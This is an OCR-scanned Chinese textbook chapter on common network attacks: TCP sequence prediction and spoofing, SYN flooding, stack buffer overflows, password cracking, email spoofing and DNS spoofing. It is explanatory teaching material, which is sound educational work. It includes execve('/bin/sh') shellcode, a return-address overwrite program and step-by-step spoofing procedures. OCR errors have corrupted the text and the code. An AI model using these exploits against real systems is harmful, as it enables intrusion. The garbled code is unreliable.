地 估算 出 初始 序号 的 一 个 范围 。 有 了 这 个 预测 出 的 初始 序列 号 范围 ,攻击 者 可 以 对 目标 主 
机 进行 TCP 欺骗 的 盲 攻击 。 

能 够 预测 TCP 初始 序列 号 的 原因 是 其 产生 与 时 间 相 关 且 变化 频率 不 够 快 ,从 而 导致 随 
机 性 不 够 。 预 防 此 类 攻击 ,只 需 使 用 第 三 种 初始 序列 号 产生 方法 ,一 般 伪 随 机 数 发 生 器 产生 
的 序列 号 是 无 法 预测 的 。 


2.4.3 SYN flooding 


SYN flooding 是 当前 最 流行 也 是 最 有 效 的 DoS (拒绝 服务 攻击 ) 方 式 之 一 。SYN 
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flooding 攻击 能 阻止 三 次 握手 过 程 的 完成 ,特别 是 阻止 服务 器 方 接收 客户 方 的 TCP 确认 标 
志 ACK ,使 服务 器 相应 端口 处 于 半 开 放 状 态 。 

由 于 每 个 TCP 端口 支持 的 半 开 放 连 接 数目 有 限 ,因此 超过 限制 后 服务 器 方 将 拒绝 以 后 
到 来 的 连接 请 求 , 直 到 半 开 放 连 接 超时 关闭 。 

进行 SYN flooding 攻击 时 ,攻击 主机 必须 保证 伪造 的 数据 包 源 IP 地 址 是 可 路 由 但 不 
可 达 的 主机 地 址 。 





2.4.4 ”TCP 欺骗 


TCP 欺骗 在 IP 地 址 欺骗 与 TCP 初始 序号 预测 的 基础 上 进行 ,目的 是 伪装 成 其 他 主机 
与 受害 者 通信 ,获取 更 多 信息 和 利益 。 攻 击 者 首先 利用 IP 地 址 欺骗 发 现 被 目标 主机 信任 的 
主机 ; 第 二 步 ,为 了 伪装 成 它 ,往往 需要 使 其 丧失 工作 能 力 。 由 于 攻击 者 要 代替 真正 的 被 信 
任 主机 ,他 必须 确保 真正 被 信任 的 主机 不 能 接收 到 任何 有 效 的 网 络 数据 ,和 否则 将 会 被 发 现 。 
TCP 欺骗 攻击 包括 非 盲 攻 击 和 盲 攻击 两 种 。 

2.4.4.1 非 盲 攻击 

如 果 攻 击 者 和 被 欺骗 的 目标 主机 在 同一 个 网 络 上 ,攻击 者 可 以 简单 地 使 用 协议 分 析 器 
( 嗅 探 器 ) 捕 获 TCP 报 文 段 , 从 而 获得 需要 的 序列 号 。 非 盲 攻击 的 步骤 如 下 : 

(1) 攻击 者 X 要 确定 目标 主机 A 的 被 信任 主机 B 不 在 工作 状态 , 若 其 在 工作 状态 ,也 
可 使 用 SYN flooding 等 攻击 手段 使 其 处 于 拒绝 服务 状态 。 

(2) 攻击 者 X 伪造 数据 包 : BA : SYN(ISN C), 源 IP 地 址 使 用 B, 初 始 序 列 号 ISN 
为 C, 给 目标 主机 发 送 TCP 的 SYN 包 请 求 建立 连接 。 

(3) 目标 主机 回应 数据 包 : A 一 B : SYN(ISN S) ,ACK(ISN C) ,初始 序列 号 为 S, 确 认 
序号 为 C。 由 于 B 处 于 拒绝 服务 状态 ,不 会 发 出 响应 包 。 攻 击 者 X 使 用 嗅 探 器 捕获 TCP 报 
文 段 ,得 到 初始 序列 号 S。 

(4) 攻击 者 X 伪造 数据 包 : B-~~A : ACK(ISN S) ,完成 三 次 握手 建立 TCP 连接 。 

(5) 攻击 者 X 一直 使 用 B 的 IP 地 址 与 A 进行 通信 。 

2.4.4.2 盲 攻击 

如 果 攻 击 者 和 被 欺骗 的 目标 主机 不 在 同一 个 网 络 上 ,攻击 者 则 无 法 使 用 嗅 探 器 捕获 
TCP 报 文 段 。 攻 击 步骤 与 非 盲 攻击 几乎 相同 ,在 第 三 步 用 TCP 初始 序列 号 预测 技术 得 到 
初始 序列 号 。 第 五 步 ,攻击 者 X 可 以 发 送 第 一 个 数据 包 , 但 收 不 到 A 的 响应 包 , 难 以 实现 
交互 。 

盲 攻击 较为 困难 ,但 攻击 者 可 使 用 前 述 的 路 由 欺骗 技术 把 盲 攻击 转化 为 非 盲 攻击 。 

如 图 2. 14 所 示 ,建立 TCP 连接 的 第 一 步 就 是 客户 端 向 服务 器 发 送 SYN 请 求 。 通 常 ， 
服务 器 将 向 客户 端 发 送 SYN/ACK 信和 号。 客户 端 随后 向 服务 器 发 送 ACK ,然后 进行 数据 
传输 。 然 而 ,TCP 处 理 模块 有 一 个 处 理 并 行 SYN 请 求 的 上 限 , 它 可 以 看 作 是 存放 多 条 连接 
的 队列 长 度 。 其 中 ,连接 数目 包括 了 那些 三 步 握手 还 没有 最 终 完 成 的 连接 ,也 包括 了 那些 已 
成 功 完成 握手 ,但 还 没有 被 应 用 程序 所 调用 的 连接 。 如 果 达 到 队列 的 上 限 ,TCP 将 拒绝 所 
有 其 后 的 连接 请 求 , 直 至 处 理 了 部 分 连接 请 求 。 因 此 ,这 里 是 有 机 可 乘 的 ,例如 用 前 面 所 介 
绍 的 SYN flooding 攻击 。 


第 2 章 常见 的 网 络 攻击 技术 51 





攻击 者 向 被 进攻 目标 的 TCP 端口 发 送 大 量 SYN 请 求 , 这 些 请 求 的 源 地 址 是 一 个 合 ; 
的 但 是 虚假 的 IP 地 址 (假设 使 用 该 合法 IP 地 址 的 主机 没有 开机 或 者 已 经 被 攻击 而 瘫痪 ) 。 
受 攻击 的 主机 向 该 IP 地 址 发 送 响应 ,但 可 惜 是 可 无 音信 ,如 图 2. 15 所 示 。 与 此 同时 ,IP 包 
会 通知 受 攻击 主机 的 TCP: 该 主机 不 可 到 达 。 但 不 幸 的 是 TCP 会 认为 这 是 一 种 暂时 的 错 
误 , 并 继续 尝试 连接 (比如 继续 对 该 IP 地 址 进行 路 由 选择 ,发 出 SYN/ACK 数据 包 等 等 )， 
直至 在 TimeOut 时 间 内 确信 无 法 连接 。 
对 被 信任 主机 B 的 攻击 过 程 如 下 : 
时 刻 1 Z (X) 一 SYN-~B 
Z (X) 一 SYN->~B 
Z (X) 一 SYN->~B 
攻击 者 的 主机 Z 冒 充 X 把 大 批 SYN 请 求 发 送 到 被 信任 的 主机 B, 使 其 TCP 队列 
充满 。 
时 刻 2 XSYN/ACK—B 
X<—SYN/ACK—B 
被 信任 的 主机 B 向 它 所 相信 的 IP 地 址 ( 假 IP) 做 出 SYN/ACK 反应 。 在 此 期 间 , 被 信 
任 主 机 的 TCP 模块 会 对 所 有 新 的 请 求 予 以 忽视 (不 同系 统 的 TCP 保持 连接 队列 的 长 度 有 
所 不 同 。BSD UNIX 一 般 是 5,Linux 一 般 是 6) ,被 信任 主机 失去 处 理 新 连接 的 能 力 , 攻 击 
者 利用 这 段 时 间 空 阶 , 冒 充 被 信任 的 主机 ,向 目标 主机 发 起 攻击 。 
通常 ,攻击 者 不 会 使 用 正在 工作 的 IP 地 址 ,因为 这 样 一 来 ,真正 的 IP 持 有 者 就 会 收 到 
SYN/ACK 响应 , 而 随 之 发 送 告知 受 攻击 主机 自己 没有 发 起 过 连接 ,从 而 断 开 连 接 , 如 
图 2.15 所 示 。 







我 要 和 你 通信 ， 
我 的 IP 地 址 是 : 196.32.*.* 





攻击 者 A 主机 B 


『 | SYN/ACK.: 
实 IP 地 址 : PK: 
ht 同意 你 的 连接 请 求 


目的 地 址 : 
196.32.* 
图 2.15 采用 真实 在 线 的 IP 地 址 无 法 实现 IP 欺骗 


攻击 被 信任 的 主机 B, 使 之 不 能 正常 工作 并 不 是 攻击 者 的 最 终 目 的 ,下 面 要 做 的 是 对 目 
标 主机 进行 攻击 ,这 就 必须 知道 目标 主机 使 用 的 数据 包 序列 号 。 采 用 TCP 初始 序列 号 预测 
技术 ,攻击 者 可 以 生成 相应 的 TCP 数据 包 ; 当 这 些 虚假 的 TCP 数据 包 进 入 目标 主机 时 , 根 
据 估计 的 准确 度 不 同 , 会 发 生 不 同 的 情况 : 
。 如 果 估 计 的 序列 号 是 准确 的 ,进入 的 数据 将 被 放置 在 接收 缓冲 区 以 供 使 用 。 转 和 人 下 
面 的 攻击 过 程 。 
。 如 果 估 计 的 序列 号 小 于 期 待 的 数字 ,数据 报 文 将 被 放弃 。 






没有 请 求 连 接 ， 
断 开 连 接 1 











存在 ! 
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。 如 果 估 计 的 序列 号 大 于 期 待 的 数字 ,并 且 在 滑动 窗口 之 内 ,那么 ,该 数据 被 认为 是 一 
个 未 来 的 数据 ,TCP 模块 将 等 待 后 继 的 数据 。 如 果 估 计 的 序列 号 大 于 期 待 的 数字 ， 
并 且 不 在 滑动 窗口 之 内 ,那么 ,TCP 将 会 放弃 该 数据 并 返回 一 个 期 望 获得 的 数据 序 
列 号 。 但 是 ,攻击 者 的 主机 并 不 能 收 到 返回 的 数据 序列 号 。 

当 准 确 预 测 了 初始 序列 号 后 ,对 目标 主机 A 的 攻击 就 可 以 开始 了 : 

时刻 1 Z(B) 一 SYN 一 A 

攻击 者 伪装 成 被 信任 主机 的 IP 地 址 (此 时 ,该 主机 仍然 处 在 停顿 状态 ) ,向 目标 主机 的 

513 端口 (rlogin 的 端口 号 ) 发 送 连接 请 求 。 

上 时刻 2”B<-SYNVACK 一 A 

目标 主机 对 连接 请 求 作出 反应 ,发送 SYN/ACK 数据 包 给 被 信任 主机 (如 果 被 信任 主 

机 处 于 正常 工作 状态 ,那么 会 认为 是 错误 并 立即 向 目标 主机 返回 RST 数据 包 , 不 幸 的 是 此 

时 它 处 于 停顿 状态 )。 按 照 计 划 , 此 时 的 被 信任 主机 会 抛弃 该 SYN/ACK 数据 包 。 

上 时刻 3 ZC(B) 一 ACK 一 A 

攻击 者 向 目标 主机 发 送 ACK 数据 包 , 该 ACK 使 用 前 面 估计 的 序列 号 加 1( 因 为 是 在 确 
认 )。 如 果 攻 击 者 估计 得 正确 ,目标 主机 将 会 接收 该 ACK 。 至 此 ,攻击 者 主机 和 被 攻击 者 
主机 就 建立 了 一 条 TCP 连接 。 

时 刻 4 Z(B) 一 PSH 一 A 

双方 开始 数据 传输 。 通 常 ,攻击 者 将 在 系统 中 放置 一 个 后 门 ,为 下 一 次 侵入 铺 平 道路 。 








2.5 应 用 层 攻击 技术 


自 1988 年 首 只 “蠕虫 " 候 到 网 络 上 祸害 了 近 十 分 之 一 的 主机 后 ,网 络 安 全 问题 就 引起 了 
各 界 的 关注 。 许 多 企业 在 网 络 和 周边 安全 上 进行 了 大 量 的 投入 ,以 限制 黑客 们 的 网 络 攻击 。 
然而 , 当 安 全 专家 们 忙于 建立 网 络 控制 措施 时 ,黑客 们 已 经 把 目标 转向 了 应 用 层 。 

在 应 用 层 , 黑 客 们 可 以 选择 的 攻击 技术 主要 包括 缓冲 区 溢出 ` 口 令 探测 .电子 邮件 攻击 、 
DNS 欺骗 等 。 应 用 层 攻 击 可 以 绕 过 针对 网 络 层 和 传输 层 攻击 的 种 种 防护 。 据 从 事 全 球技 
术 研 究 和 咨询 的 Gartner 公司 调查 显示 , 现 阶段 成 功 的 网 络 攻 击 案例 中 至 少 有 75% 发 生 在 
应 用 层 。 


2.5.1 缓冲 区 溢出 


25.1.1 概念 

缓冲 区 溢出 是 指 : 当 计算 机 向 缓冲 区 内 填充 数据 时 ,填充 的 位 数 超过 了 缓冲 区 本 身 的 
容量 ,溢出 的 数据 覆盖 了 其 他 程序 或 系统 的 合法 数据 。 

如 果 所 有 程序 都 严格 地 先 申请 足够 的 缓冲 区 长 度 , 然 后 检查 数据 的 长 度 , 不 允许 输入 超 
过 缓冲 区 长 度 的 数据 存 人 缓冲 区 ,那么 就 不 会 产生 缓冲 区 溢出 的 问题 。 但 是 ,大 多 数 程序 员 
习惯 于 假设 数据 长 度 总 是 与 所 分 配 的 存储 空间 相 匹 配 ,这 就 为 缓冲 区 溢出 埋 下 隐患 。 

缓冲 区 可 以 设 在 堆栈 (Cstack ,自动 变量 )、 堆 (heap ,动态 分 配 的 内 存 区 ) 或 静态 资料 区 。 
缓冲 区 溢出 是 一 种 非常 普遍 而 危险 的 漏洞 ,其 中 最 为 危险 的 是 堆栈 溢出 ,因为 攻击 者 可 以 利 
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用 堆栈 溢出 ,在 函数 返回 时 改变 返回 程序 的 地 址 ,让 其 跳 转 到 任意 地 址 ,可 以 利用 它 使 系统 
骨 溃 ,导致 拒绝 服务 ,也 可 以 利用 它 执行 非 授权 指令 ,甚至 可 以 取得 系统 特权 ,进而 进行 各 种 
非法 操作 。 
先 看 下 面 这 段 代 码 , 主 程序 在 字符 数组 buffer 中 连续 放 入 256 个 字符 A, 然 后 调用 函数 
fun。 
void fun ( char * str ) { 
char buf [16]; 


strcpy( buf, str ); 
: 


Main( ) { 
char buffer[256]; 
int i; 
for (i = 0; i<256; i++) 
buffer[i] = 'A'; 
fun ( buffer ) ; 
} 


编译 执行 这 段 代码 后 出 现 这 样 的 提示 : Segmentation fault (core dumped) ,这 意味 着 发 
生 了 缓冲 区 溢出 。 

如 果 在 buffer 中 保存 的 不 是 字符 A, 而 是 攻击 者 想 执行 的 代码 (shellcode: UNIX/ 
Linux 环境 下 外 壳 代码 ) ,其 溢出 部 分 的 长 度 覆盖 了 调用 函数 fun 的 返回 地 址 (ret) ,使 它 指 
向 缓冲 区 中 shellcode( 其 内 容 是 取得 高 级 权限 的 恶意 代码 ) 的 开头 。 那 么 ,在 当前 执行 进程 
(或 函数 ) 返 回 时 就 可 以 跳 转 到 shellcode 处 ,并且 攻 击 者 会 获得 管理 员 权 限 ,这 样 就 可 以 在 
目标 主机 上 植 人 木马 ,修改 或 建立 一 个 新 的 Socket 连接 等 。 

2.5.1.2 原理 

我 们 知道 堆栈 ”的 特点 是 “后 进 先 出 ”, 而 在 高 级 语言 中 使 用 堆栈 的 场合 有 函数 调用 、 函 
数 中 的 临时 变量 参数 的 传递 和 返回 值 。 

当 程 序 中 发 生 函 数 调 用 时 ,步骤 如 下 : 

(1) 把 参数 压 人 堆栈 。 

(2) 保存 指令 寄存 器 (IP) 中 的 内 容 , 作 为 返回 地 址 (RET) 。 

(3) 将 基 址 寄存 器 (FP) 压 人 堆栈 。 

(4) 把 当前 的 栈 指针 (CSP) 复 制 到 FP, 作 为 新 的 基地 址 。 

(5) 为 本 地 变量 分 配 空间 ,把 SP 减 去 适当 的 数值 。 

在 上 面 的 小 例子 中 ,从 buf 开始 的 256B 都 将 被 * str 的 内 容 'A' 履 六 ,包括 sfp、ret 甚至 
x str。 而 'A' 的 十 六 进 值 为 0x41, 所 以 函数 的 返回 地 址 变 成 了 0x41414141, 超 出 了 程序 的 地 
址 空间 ,所 以 会 出 现 段 错 误 Segmentation fault (core dumped)。 

下 一 步 ,在 溢出 的 缓冲 区 中 写 和 人 想 执行 的 代码 ,再 覆盖 返回 地 址 (ret) 的 内 容 , 使 它 指 向 
缓冲 区 的 开头 ,就 可 以 达到 运行 其 他 指令 的 目的 。 如 果 攻 击 者 想 要 执行 的 代码 已 经 在 被 攻 
击 的 程序 中 了 ,他 只 要 对 代码 传递 一 些 参 数 。 例 如 ,攻击 代码 要 求 执行 exec ("/bin/sh") ， 
而 在 libc 库 中 的 代码 执行 exec(arg) ,其 中 arg 是 字符 串 的 指针 参数 ,攻击 者 只 要 把 传人 的 
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小 


数 指针 改 向 指向 "/bin/sh" 即 可 。 例 如 : 


void main( ) { 
char * name[2]; 
name[0] = "/bin/sh"; 
name[1] = NULL; 
execve( name[0], name, NULL ); 


} 


char shellcode[ ] = "\xeb\xlf\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\ 
xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/ 
ah 


/* 执行 外 部 程序 的 二 进 制 代码 * / 


char large_string[128]; 
void main( ) 
{ 
char buffer[96]; 
int i; 
long * long ptr = (long * ) large string; 
for (i = 0; i<32; i++) 
x* (long ptr + i) = (int) buffer; 
for (i = 0; i<strlen(shellcode); i++) 
large string[i] = shellcode[i]; 
strcpy( buffer, large_string); 
} 
这 段 小 程序 完成 了 下 面 3 个 动作 : 
。 在 large_string 中 填 入 buffer 的 地 址 ,并 把 shell 代码 放 到 large_string 的 前 面部 分 。 
。 将 large_string 复制 到 buffer 中 ,造成 溢出 ,使 返回 地 址 变 为 buffer, 而 buffer 的 内 
容 为 shell 代码 。 
。 当 程 序 试 从 strcpy( ) 中 返回 时 ,就 会 转 而 执行 shell。 
Windows NT 系统 ,Internet Information Server 4. 0(JIS 4) 等 都 曾 因 为 存在 缓冲 区 洲 
出 的 漏洞 而 遭受 过 黑客 的 攻击 。 


2.5.2 口令 攻击 


无 论 用 户 使 用 什么 操作 系统 ,如 果 要 使 用 文件 传输 服务 或 远程 登录 ,系统 总 是 要 核实 访 
问 者 的 身份 ,只 有 通过 身份 验证 的 用 户 才 被 允许 使 用 系统 本 身 及 其 资源 。 访 问 者 的 合法 身 
份 就 是 其 用 户 账号 和 口令 。 

一 般 情况 下 ,用 户 账号 由 含 两 个 以 上 字符 且 容 易 记忆 的 字符 串 组 成 。 获 得 素 不 相识 的 
用 户 的 账号 看 上 去 并 不 容易 ,可 是 人 们 的 一 些 习惯 往往 会 不 知 不 觉 地 泄露 了 自己 的 用 户 名 : 
为 了 方便 记忆 ,账号 常常 是 用 户 姓 名 的 缩写 。 看 看 自己 的 电子 邮件 地 址 .QQ 用 户 名 ,论坛 
登录 名 ,是 否 就 包含 了 在 常用 计算 机 上 的 账号 ?而 当 攻 击 者 能 够 使 用 目标 主机 的 Finger 功 
能 时 ,就 可 以 查询 到 主机 系统 保存 的 用 户 资料 (用 户 名 、 登 录 时 间 等 ) ,这样 内 部 的 攻击 者 就 
很 容易 拿 到 需要 的 高 权限 帐号。 如 果 这 些 都 不 行 ,还 可 以 利用 网 络 监 听 技 术 , 将 用 户 账号 和 
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口令 一 网 打 尽 。 

由 于 用 户 账号 的 保密 性 比较 差 ,口令 的 安全 就 显得 相当 重要 了 。 口令 攻击 就 是 为 了 获 
得 用 户 的 口令 ,前 提 是 先 获得 了 目标 主机 上 的 某 个 合法 用 户 账 号 。 获 得 用 户口 令 有 多 种 方 
法 ,其 中 “社会 工程 ”的 方法 是 利用 骗局 破解 密码 ,往往 会 让 没有 防备 的 人 们 不 知道 何 时 就 泄 
露 了 口令 。 例 如 ,著名 黑客 米 特 尼克 所 写 的 (欺骗 的 艺术 》 就 阐述 了 如 何 运 用 社会 工程 学 原 
理 破解 密码 (此 书 也 被 列 为 网 络 安 全 人 员 必 读 教程 )。 

下 面 引用 了 书 中 的 一 个 例子 : 某 公司 新 任 安全 分 析 师 John 要 测试 公司 的 安全 状态 ,他 
首先 给 技术 支持 人 员 打 了 一 个 电话 ,说 自己 是 远程 用 户 ,要求 重 设 密码 。 由 于 John 知道 公 
司 的 命名 约定 是 用 户 名 加 上 姓 的 首 字母 ,并 且 从 公司 的 电话 目录 中 知道 信息 总 监 名字 是 
Jeff, 姓 Ronald, 即 他 的 登录 名 是 JeffR。John 假装 成 Jeff 打 电 话 给 技术 支持 人 员 说 自己 忘 
记 了 密码 并 要 求 重 设 。 技 术 支 持 人 员 每 天 都 要 做 多 次 这 样 的 工作 ,很 快 就 给 他 回电 话 ,告诉 
他 新 的 密码 是 friday, 因 为 恰好 是 星期 五 。 然 后 John 就 以 Jeff 的 身份 登录 了 。 

获得 用 户口 令 的 方法 还 有 猜测 .字典 攻击 、 强 行 攻击 ` 利 用 工具 破解 等 。 

1. 猜测 简单 口令 

很 多 人 习惯 使 用 自己 或 家 人 的 生日 、 电 话 号 码 、 车 牌号 码 、 简 单数 字 或 者 身份 证 号 码 中 
的 几 位 ,或 使 用 自己 .孩子 .配偶 的 名 字 或 昵称 ,或 使 用 一 些 默认 口令 、 在 计算 机 周边 可 以 看 
到 的 字 串 等 ,还 有 系统 管理 员 使 用 admin system password 等 简单 词语 ,甚至 不 设 密码 ,这 
样 黑客 很 容易 猜 到 密码 。 

2. 字典 攻击 

在 UNIX 操作 系统 中 ,用 户 的 基本 信息 存放 在 passwd 文件 中 ,所 有 的 口令 经 过 DES 加 密 
后 专门 存放 在 shadow 文件 中 。UNIX 系统 利用 函数 crypt() 对 口令 进行 加 密 , 同 样 crypt() 也 
可 以 破解 口令 。 

多 数 用 户 会 使 用 词典 中 的 单词 作为 口令 ,词典 攻击 就 是 用 一 个 包含 大 多 数 单词 的 词典 
文件 来 猜测 用 户口 令 。 字 典 里 一 般 每 行 一 个 单词 ,以 明码 文本 形式 出 现 ,使 用 有 一 万 个 单词 
的 词典 一 般 能 猜测 出 系统 中 70% 的 口令 。 与 尝试 所 有 可 能 的 组 合 相 比 ,字典 攻击 需要 的 时 
间 短 得 多 。 互 联网 上 有 许多 不 同 语言 的 字典 ,黑客 们 可 以 用 来 破解 别 国 用 户 的 口令 。 

字典 攻击 的 做 法 是 将 字典 中 的 大 量 单词 送 到 琢 数 crypt() 中 ,看 看 是 否 有 与 /etc/ 
passwd 文件 中 加 密 口 令 相 匹配 的 单词 。 如 果 有 一 个 单词 与 目标 口令 匹配 , 则 认为 口令 被 破 
解 , 并 将 其 相应 的 明码 文本 单词 保存 到 文件 中 。 这 种 方法 很 成 功 , 一 些 口 令 破 解 工 具 就 是 这 
样 实现 的 。 

3. 强行 攻击 

强行 攻击 是 对 所 有 字母 ,数字 、 特 殊 字 符 所 有 的 组 合 进行 尝试 ,组 合 的 长 度 为 1 一 2(7 为 
破解 到 口令 时 的 组 合 长 度 或 者 系统 对 口令 长 度 的 最 大 限制 )。 强 行 攻击 是 对 口令 可 能 的 字 
符 集 采用 穷 举 法 ,例如 先 从 字母 a 开始 ,尝试 aa,ab,ac,…,az,a0,al,…,a9, 然 后 尝试 aaa， 
aab,aac,*…。 

由 4 个 小 写字 母 组 成 的 口令 共有 26* 种 组 合 ,利用 普通 的 计算 机 一 般 可 以 在 几 分 钟 内 
破解 ,而 由 10 个 含 大 ,小 写字 母 及 数字 、 标 点 组 成 的 口令 ,其 可 能 的 组 合 为 82" ,这 个 数字 已 
经 远 远 超出 了 我 们 的 想象 。 但 是 ,如 果 有 速度 足够 快 的 计算 机 ,理论 上 仍然 能 最 终 破解 所 有 
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的 口令 。 是 否 进 行 强行 攻击 主要 看 花费 的 代价 与 能 获得 的 信息 的 价值 相 比 是 否 值 得 。 

另外 ,Internet 蕴含 了 超级 的 计算 能 力 , 对 于 安全 也 是 很 大 的 冲击 。 在 1993 年 , 非 对 称 
密码 算法 RSA 的 三 个 发 明 者 在 (科学 美国 人 》 的 数学 游戏 专栏 上 公布 了 一 个 129 位 的 十 进 
数 (426b) ,悬赏 奖励 分 解 该 数 的 读者 。 当 时 他 们 估计 至 少 在 4 亿 亿 年 后 才能 得 到 破译 结果 。 
然而 ,1994 年 4 月 ,由 Atkins 等 人 在 Internet 上 动用 了 1600 台 计 算 机 ,仅仅 工作 了 8 个 月 
之 后 就 领 到 了 这 笔 奖金 。 

4. 利用 工具 破解 

现在 ,已 有 不 少 口令 破解 工具 ,例如 ,UNIX 平 台 下 最 常用 的 是 Crack, 这 种 工具 快速 灵 
活 ,并且 可 以 对 规则 进行 组 合 ; LOphtCrack 用 于 Windows NT 的 口令 攻击 ; PWDump2 针 
对 Windows 2000; John the Ripper 可 以 在 UNIX 和 Windows 平台 运行 ,功能 强大 ,运行 速 
度 快 ,还 可 以 进行 字典 攻击 和 强行 攻击 ; 在 规定 所 需要 使 用 的 字符 数目 和 字符 类 型 后 ， 
Slurpie 能 执行 词典 攻击 和 定制 的 强行 攻击 ,并且 能 分 布 运行 , 即 把 几 台 计算 机 组 成 一 台 
布 式 虚拟 机 ,在 很 短 的 时 间 里 完成 破解 任务 。 其 他 还 有 CrackerJack、Qcrack、Pcrack、 
Hades .NWPCRACK、ADSL 密码 破解 工具 .QQ 密码 破解 器 .邮箱 密码 破解 软件 .压缩 文件 
密码 破解 器 等 ,也 有 很 多 针对 Windows 7、Windows 10 的 口令 破解 工具 ,有 兴趣 的 读者 可 以 
查阅 有 关 资 料 。 
2.5.3 电子 邮件 攻击 


电子 邮件 (E-mail) 是 用 户 使 用 最 多 的 互联 网 业务 之 一 ,也 是 黑客 们 的 一 个 攻击 重点 。 
由 于 电子 邮件 系统 中 存在 许多 安全 漏洞 ,因此 使 用 电子 邮件 其 实 面临 巨大 的 安全 风险 ,例如 
伪造 邮件 、 窃 取 / 臭 改 数 据 和 病毒 等 。 

2.5.3.1 电子 邮件 系统 中 的 安全 漏洞 

1. Hotmail Service 漏洞 

微软 公司 的 Hotmail Service 中 存在 一 系列 安全 问题 ,利用 这 些 安全 漏洞 很 容易 窃取 到 
Hotmail 用 户 的 口令 : 攻击 者 发 送 包 含 JavaScript 代码 的 信息 , 当 Hotmail 用 户 看 到 信息 
时 ,内 嵌 的 JavaScript 代码 要 求 用 户 重新 登录 进 Hotmail。 而 当 用 户 这 样 做 的 时 候 , 其 用 户 
名 ,口令 和 IP 地 址 都 被 通过 E-mail 发 送 到 攻击 者 手中 。 

2. sendmail 安全 漏洞 

sendmail 是 一 个 非常 复杂 庞大 的 系统 ,一 直 存 在 安全 问题 ,例如 ,可 以 通过 sendmail 来 
查看 目标 系统 上 是 否 运行 decode 别名 ,该 别名 有 很 多 隐患 ; 早期 版 本 不 对 发 送 方 进行 
认证 。 

3. 用 Web 浏览 器 查看 邮件 

基于 Web 的 免费 电子 邮件 用 户 越 来 越 多 ,但 也 屡 唱 攻击。 这 不 是 偶然 的 ,因为 用 浏览 
器 来 查看 邮件 有 先天 性 缺陷 ,这 使 得 黑客 通过 JavaScript、Java、CGI 等 技术 实施 攻击 成 为 
可 能 。 

4. E-mail 服务 器 的 开放 性 带 来 的 威胁 

E-mail 服务 器 向 全 球 开放 ,很 容易 受到 黑客 的 袭击 ,从 而 暴露 用 户 隐 私 。 信 息 可 能 携 
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带 损害 服务 器 的 指令 。 例 如 : Morris bug 有 一 种 会 损坏 Sendmail 的 指令 ,这 个 指令 可 使 其 
执行 黑客 发 出 的 命令 。 
5. E-mail 传输 形式 的 潜在 威胁 
多 数 E-mail 还 是 以 明文 形式 传输 的 ,这 样 用 户 的 私有 信息 很 难得 到 保障 。 
2.5.3.2 电子 邮件 攻击 
电子 邮件 攻击 主要 有 两 种 形式 : E-mail 欺骗 和 E-mail 炸弹 。 
1. E-mail 欺骗 
目前 ,利用 E-mail 进行 欺骗 的 行为 主要 有 以 下 几 种 : 
。 E-mail 宣称 来 自 系 统管 理 员 , 要 求 用 户 将 口令 改变 为 特定 的 字符 串 ,并 声明 如 果 用 
户 不 照 此 办 理 , 将 会 发 生 对 用 户 不 利 的 种 种 情况 。 实 际 上 ,任何 系统 管理 员 都 不 会 
用 E-mail 发 出 这 样 的 要 求 ; 
。 E-mail 声称 来 自 某 一 授权 人 ,要 求 用 户 发 送 其 口令 文件 或 是 其 他 敏感 信息 的 副本 。 
由 于 简单 邮件 传输 协议 (SMTP) 没 有 验证 系统 ,伪造 E-mail 十 分 方便 。 但 是 ,如 果 
注意 查看 E-mail 信息 的 表 头 ,注意 E-mail 到 达 目 的 地 前 经 过 的 所 有 “跳跃 ”或 暂停 
地 ,注意 表 头 中 诸如 “ 接 到 ”和 “信息 -ID” 的 信息 ,并 与 E-mail 的 发 出 / 收 到 记录 比较 ， 
就 会 看 到 甚至 会 找到 E-mail 欺骗 的 蛛丝马迹 。 
例如 ,用户 收 到 一 封 mail, 无 正文 ,附件 为 soft. exe、card. exe 或 picture. exe, 双 击 后 无 
任何 反应 。 此 类 文件 是 著名 的 “特洛伊 木马 ”, 属 有 害 程序 ,会 在 用 户 接 入 互联 网 后 被 远 端 黑 
客 控制 , 盗 取 密 码 及 文件 ,甚至 破坏 硬盘 等 。 所 以 ,凡是 E-mail 的 附件 是 可 执行 文件 
(. EXE、. COM) 及 Word、Excel 文档 (包括 . DO? 和 . XL? 等 ) , 切 不 可 随便 打开 或 运行 , 除 
非 能 确定 它 不 含 恶意 程序 。 
2. E-mail 炸弹 
E-mail 炸弹 就 是 让 某 个 用 户 反 复 收 到 地 址 不 详 、 容 量 巨 大 、 内 容 粗 俗 的 邮件 ,是 黑客 的 
主要 攻击 手段 之 一 。E-mail 炸弹 虽然 简单 ,但 是 危害 却 非 常 巨 大 , 它 大 量 占用 了 用 户 的 邮 
箱 容量 ,有 可 能 导致 丢失 正常 邮件 ,影响 用 户 的 工作 ; 它 使 得 邮件 服务 器 空间 紧张 ,异常 繁 
忙 , 网 络 负载 加 剧 ,响应 迟钝 ,影响 其 他 用 户 的 正常 工作 ,甚至 造成 服务 器 崩溃 。 
所 以 ,现在 很 多 邮件 服务 器 上 都 启用 了 邮件 过 滤 系 统 和 防 电子 邮件 病毒 软件 ,而 对 付 邮 
件 欺骗 则 需要 使 用 如 PGP 一 类 的 邮件 加 密 签名 技术 。 


2.5.4 DNS 欺骗 


Internet 上 采用 IP 地 址 识别 主机 ,而 用 户 更 习惯 于 通过 有 意义 的 名 称 记忆 网 站 。DNS 
服务 就 成 了 名 称 与 地 址 之 间 的 桥梁 ,也 成 为 Internet 上 必 不 可 少 的 基础 服务 。 但 是 由 于 
DNS 协议 不 对 转换 或 信息 的 更 新 进行 身份 认证 ,攻击 者 可 以 将 错误 的 信息 告知 DNS 服务 
器 ,从 而 通过 DNS 欺骗 的 手段 将 用 户 引 向 攻击 者 指定 的 主机 。 例 如 ,DNS 上 原来 对 某 个 网 
站 的 地 址 解析 项 目 是 ”**# 网 站 的 域名 一 一 网 站 的 IP 地 址 ”, 而 攻击 者 告知 DNS 一 个 更 新 信 
息 “ x*x 网 站 的 域名 一 一 攻击 者 设 定 的 IP 地 址 ”。 

这 样 , 当 用 户 依然 打开 自己 熟悉 的 链接 访问 网 站 时 ,网 页 的 URL 虽然 没 变 , 但 实际 的 
数据 包 已 经 发 到 了 攻击 者 的 主机 上 。 如 果 攻 击 者 提供 的 网 页 和 真实 网 站 的 网 页 很 相似 ,用 
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户 可 能 很 长 时 间 都 发 现 不 了 这 个 问题 。 

